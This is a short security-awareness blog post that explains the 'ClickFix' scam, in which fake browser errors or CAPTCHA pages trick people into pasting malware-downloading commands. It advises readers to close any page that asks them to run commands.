The term “ClickFix” was coined by Proofpoint researchers and first publicly used in their November 18, 2024, blog post analyzing social engineering attacks observed since March 2024.

Many online attacks don’t break into your computer — they try to persuade you to break into it yourself.

That’s exactly what a tactic called ClickFix does.

ClickFix is a scam technique where criminals create fake error messages on websites to trick you into copying and pasting a command into your computer. When you run that command, it secretly downloads malware.

Instead of looking scary, these messages usually look official and helpful, which is why they work.

Common tricks you might see

ClickFix messages often pretend to be things you recognise, such as:

  • A message saying you need to refresh or update your browser to view a page.
  • A fake alert claiming you’re missing a plugin to open a PDF or Word document.
  • A fake security check or CAPTCHA, designed to look like Cloudflare or Google.
  • Fake error screens that imitate:
    • Chrome’s “Aw, Snap!” crash page
    • Microsoft Word extension problems
    • Messages telling you to run a command to access a Discord server.

In every case, the pattern is the same:

A fake problem is shown, and you are told to “fix it” by running a command.

  • Appearing ON a website
  • Appearing ON a website

The simple rule to stay safe

If a website ever tells you to:

  • press Windows + R,
  • open PowerShell (Windows) or Terminal (Mac), or
  • copy and paste a command from a webpage,

stop immediately. Close the page. Do not run it.

Legitimate websites never require you to run commands just to view content.

If you’ve already run one of these commands and you’re worried, contact me.

Leave a Reply

Your email address will not be published. Required fields are marked *